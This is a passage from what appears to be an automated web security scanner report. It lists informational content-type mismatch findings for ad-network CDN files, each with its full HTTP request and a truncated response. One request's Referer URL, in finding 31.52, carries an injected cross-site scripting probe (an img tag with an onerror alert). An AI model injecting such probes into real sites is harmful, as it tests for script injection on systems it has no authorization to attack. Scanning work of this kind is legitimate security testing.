Content-Type: text/plain; charset=UTF-8
Content-Language: en, en
Cache-Control: private, max-age=31536000
Age: 34909
Expires: Fri, 03 Feb 2012 11:10:40 GMT
Connection: Keep-Alive

trc_json_locale_data={"rbox":{"":{"MIME-Version":" 1.0","POT-Creation-Date":" 2009-06-03 19:30+0300","X-Poedit-SourceCharset":" utf-8","X-Poedit-Country":" ISRAEL","X-Poedit-Language":" Hebrew","Last-
...[SNIP]...

31.41. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_0.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_adv_0.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /prod/ig/110121-160940_adv_0.html HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html?pid=2331&plid=23663
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1296770448506; ig=0; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_1g6v=h0l%3A859%3A1; T_kjvx=h0h%3A859%3A1; dly2=3-lg2afw-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2afw-1~15stqp6ba7xf0~i9b~4fqb~0-; rth=2-lg22an-h0h~859~1~1-h0l~859~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:59:59 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af87-13f23-456cadc0"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 07:52:39 GMT
Age: 50840
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:59 GMT
Connection: keep-alive
Content-Length: 81699

L=[["autos.aol.com/?icid=navbar_Autos",[6,684]],["autos.msn.com/default.aspx",[6,839]],["autos.yahoo.com/",[6,684]],["www.autobytel.com/",6],["www.automotive.com/index.html",6],["www.autotrader.com/",
...[SNIP]...

31.42. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_1.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_adv_1.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /prod/ig/110121-160940_adv_1.html HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html?pid=2331&plid=23663
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1296770448506; ig=0; lp=0; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_1g6v=h0l%3A859%3A1; T_kjvx=h0h%3A859%3A1; dly2=3-lg2afw-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2afw-1~15stqp6ba7xf0~i9b~4fqb~0-; rth=2-lg22an-h0h~859~1~1-h0l~859~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:00 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af78-17ea8-456cadc0"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 21:43:26 GMT
Age: 994
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:59 GMT
Connection: keep-alive
Content-Length: 97960

L=[["autos.aol.com/car-Volkswagen-az/",152],["autos.msn.com/browse/Volkswagen.aspx",152],["autos.yahoo.com/volkswagen/",152],["www.cars.com/volkswagen/",152],["www.edmunds.com/finder/make.volkswagen.h
...[SNIP]...

31.43. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_10.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_adv_10.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /prod/ig/110121-160940_adv_10.html HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html?pid=2331&plid=23659
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1296770486373; ig=0; lp=9; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_h9m4=h0l%3A86c%3A1; T_4mpe=h0h%3A86c%3A1; T_3q8t=h0l%3A86c%3A1; T_ax3f=h0h%3A86c%3A1; dly2=3-lg2agz-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2agz-1~1b4ykgj40t72i~i9b~4fqb~0-1~14288lsu2vxsy~i97~4fq7~q-1~1aao14q745q7r~i9b~4fqb~q-1~15stqp6ba7xf0~i9b~4fqb~13-; rth=2-lg22an-h0h~86c~1~1-h0l~86c~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:46 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af75-140c7-456cadc0"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 12:55:15 GMT
Age: 32731
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:59 GMT
Connection: keep-alive
Content-Length: 82119

L=[["losangeles.citysearch.com/profile/283437/valencia_ca/magic_mountain.html",2625],["media.universalorlando.com/",2625],["micechat.com/forums/other-theme-parks-destinations/118246-legoland-central-f
...[SNIP]...

31.44. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_2.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_adv_2.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /prod/ig/110121-160940_adv_2.html HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html?pid=2331&plid=23663
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1296770448506; ig=0; lp=1; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_1g6v=h0l%3A859%3A1; T_kjvx=h0h%3A859%3A1; dly2=3-lg2afw-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2afw-1~15stqp6ba7xf0~i9b~4fqb~0-; rth=2-lg22an-h0h~859~1~1-h0l~859~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:02 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af69-156ac-456cadc0"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 14:21:45 GMT
Age: 27497
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:59 GMT
Connection: keep-alive
Content-Length: 87724

L=[["www.wowinsider.com/category/wrath-of-the-lich-king/",675],["www.wowwiki.com/",675],["www.wowwiki.com/Lich_King",675],["www.wowwiki.com/World_of_Warcraft:_Wrath_of_the_Lich_King",675],["www.zam.co
...[SNIP]...

31.45. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_3.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_adv_3.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /prod/ig/110121-160940_adv_3.html HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html?pid=2331&plid=23663
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1296770448506; ig=0; lp=2; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_1g6v=h0l%3A859%3A1; T_kjvx=h0h%3A859%3A1; dly2=3-lg2afw-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2afw-1~15stqp6ba7xf0~i9b~4fqb~0-; rth=2-lg22an-h0h~859~1~1-h0l~859~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:03 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af63-188d7-455d6b80"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 05:08:58 GMT
Age: 60665
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:58 GMT
Connection: keep-alive
Content-Length: 100567

L=[["www.babycenter.com/0_supplementing-with-formula_8484.bc",791],["www.babycenter.com/baby-formula-feeding",791],["www.babycenter.com/choosing-and-using-baby-formula",791],["www.gerber.com/Articles/
...[SNIP]...

31.46. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_4.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_adv_4.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /prod/ig/110121-160940_adv_4.html HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html?pid=2331&plid=23663
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1296770448506; ig=0; lp=3; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_1g6v=h0l%3A859%3A1; T_kjvx=h0h%3A859%3A1; dly2=3-lg2afw-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2afw-1~15stqp6ba7xf0~i9b~4fqb~0-; rth=2-lg22an-h0h~859~1~1-h0l~859~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:04 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af56-16923-455d6b80"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 17:08:54 GMT
Age: 17470
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:58 GMT
Connection: keep-alive
Content-Length: 92451

L=[["www.fordvehicles.com/suvs/escape/gallery/",835],["www.fordvehicles.com/suvs/escape/incentives/offers/results/index.asp?model=Escape&zip=90245&year=2009&planType=&referrer=www.ford.com",835],["www
...[SNIP]...

31.47. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_5.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_adv_5.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /prod/ig/110121-160940_adv_5.html HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html?pid=2331&plid=23659
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1296770486373; ig=0; lp=4; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_h9m4=h0l%3A86c%3A1; T_4mpe=h0h%3A86c%3A1; T_3q8t=h0l%3A86c%3A1; T_ax3f=h0h%3A86c%3A1; dly2=3-lg2agz-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2agz-1~1b4ykgj40t72i~i9b~4fqb~0-1~14288lsu2vxsy~i97~4fq7~q-1~1aao14q745q7r~i9b~4fqb~q-1~15stqp6ba7xf0~i9b~4fqb~13-; rth=2-lg22an-h0h~86c~1~1-h0l~86c~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:38 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af4d-16544-455d6b80"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 04:50:53 GMT
Age: 61785
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:58 GMT
Connection: keep-alive
Content-Length: 91460

L=[["www.automotive.com/2009/12/mazda/tribute/pricing/index.html",999],["www.automotive.com/2009/12/mazda/tribute/rebates/index.html",999],["www.automotive.com/2009/12/mazda/tribute/review/index.html"
...[SNIP]...

31.48. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_6.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_adv_6.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /prod/ig/110121-160940_adv_6.html HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html?pid=2331&plid=23663
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1296770486373; ig=0; lp=5; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_h9m4=h0l%3A86c%3A1; T_4mpe=h0h%3A86c%3A1; T_3q8t=h0l%3A86c%3A1; T_ax3f=h0h%3A86c%3A1; dly2=3-lg2agz-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2agz-1~1b4ykgj40t72i~i9b~4fqb~0-1~14288lsu2vxsy~i97~4fq7~q-1~1aao14q745q7r~i9b~4fqb~q-1~15stqp6ba7xf0~i9b~4fqb~13-; rth=2-lg22an-h0h~86c~1~1-h0l~86c~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:39 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af3d-153db-455d6b80"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 19:50:41 GMT
Age: 7798
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:58 GMT
Connection: keep-alive
Content-Length: 87003

L=[["www.cars.com/go/crp/research.jsp?makeid=1&modelid=8231&year=2010&myid=11421&acode=&mode=&aff=national&section=prices",1063],["www.cars.com/go/crp/research.jsp?makeid=1&modelid=8231&year=2010&myid
...[SNIP]...

31.49. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_7.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_adv_7.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /prod/ig/110121-160940_adv_7.html HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html?pid=2331&plid=23659
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1296770486373; ig=0; lp=6; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_h9m4=h0l%3A86c%3A1; T_4mpe=h0h%3A86c%3A1; T_3q8t=h0l%3A86c%3A1; T_ax3f=h0h%3A86c%3A1; dly2=3-lg2agz-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2agz-1~1b4ykgj40t72i~i9b~4fqb~0-1~14288lsu2vxsy~i97~4fq7~q-1~1aao14q745q7r~i9b~4fqb~q-1~15stqp6ba7xf0~i9b~4fqb~13-; rth=2-lg22an-h0h~86c~1~1-h0l~86c~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:41 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af35-12a36-455d6b80"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 14:47:14 GMT
Age: 26007
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:58 GMT
Connection: keep-alive
Content-Length: 76342

L=[["www.snagajob.com/job-seeker/jobs/statelist.aspx",1367],["|employer.snagajob.com/4easysteps/stepOne.aspx",1367],["eventful.com/saltlakecity/venues/stevenhenager-college-of-business-/V0-001-0002682
...[SNIP]...

31.50. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_8.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_adv_8.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /prod/ig/110121-160940_adv_8.html HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html?pid=2331&plid=23663
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1296770486373; ig=0; lp=7; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_h9m4=h0l%3A86c%3A1; T_4mpe=h0h%3A86c%3A1; T_3q8t=h0l%3A86c%3A1; T_ax3f=h0h%3A86c%3A1; dly2=3-lg2agz-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2agz-1~1b4ykgj40t72i~i9b~4fqb~0-1~14288lsu2vxsy~i97~4fq7~q-1~1aao14q745q7r~i9b~4fqb~q-1~15stqp6ba7xf0~i9b~4fqb~13-; rth=2-lg22an-h0h~86c~1~1-h0l~86c~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:42 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af25-15f93-455d6b80"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 07:53:14 GMT
Age: 50848
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:58 GMT
Connection: keep-alive
Content-Length: 90003

L=[["www.dealbase.com/Las-Vegas/Hard-Hotel-Casino-Vegas-deals-328",1699],["www.hotelscombined.com/hotel/hard_rock_hotel_las_vegas.htm",1699],["www.lasvegastourism.com/express_hardrock.htm",1699],["www
...[SNIP]...

31.51. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_9.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_adv_9.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /prod/ig/110121-160940_adv_9.html HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html?pid=2331&plid=23659
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1296770486373; ig=0; lp=8; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_h9m4=h0l%3A86c%3A1; T_4mpe=h0h%3A86c%3A1; T_3q8t=h0l%3A86c%3A1; T_ax3f=h0h%3A86c%3A1; dly2=3-lg2agz-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2agz-1~1b4ykgj40t72i~i9b~4fqb~0-1~14288lsu2vxsy~i97~4fq7~q-1~1aao14q745q7r~i9b~4fqb~q-1~15stqp6ba7xf0~i9b~4fqb~13-; rth=2-lg22an-h0h~86c~1~1-h0l~86c~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:44 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af1b-13c6c-455d6b80"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 20:48:34 GMT
Age: 4330
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:58 GMT
Connection: keep-alive
Content-Length: 81004

L=[["blogs.thecarconnection.com/marty-blog/1021387_2010-chevrolet-malibu-drops-hybrid-heres-why",1915],["autos.aol.com/cars-Nissan-Sentra-2010/expert-review",1916],["autos.aol.com/cars-Nissan-Sentra-2
...[SNIP]...

31.52. http://content.scanscout.com/ssframework/dt/dl_0.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://content.scanscout.com
Path:   /ssframework/dt/dl_0.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ssframework/dt/dl_0.js HTTP/1.1
Host: content.scanscout.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; networkInfo=57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V|0; campUnique=1426141; sssrvyhst2=110203_1426141; osh=626_1296767643681; behavioralSegments=29_110203_2|32_110203_2|263_110203

Response

HTTP/1.1 200 OK
Server: Apache
p3p: policyref=/w3c/p3p.xml
Content-Language: en-US
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=14400
Date: Thu, 03 Feb 2011 21:14:06 GMT
Connection: close
Content-Length: 175


if (!self.ScanScout) self.ScanScout = {};var ScanScout = self.ScanScout;if (!ScanScout.dde) {ScanScout.dde = {};ScanScout.dde.isComplete = function () {return 1;};};

31.53. http://core.videoegg.com/eap/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://core.videoegg.com
Path:   /eap/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /eap/ HTTP/1.1
Host: core.videoegg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __qca=P0-2047109742-1295039241849;

Response

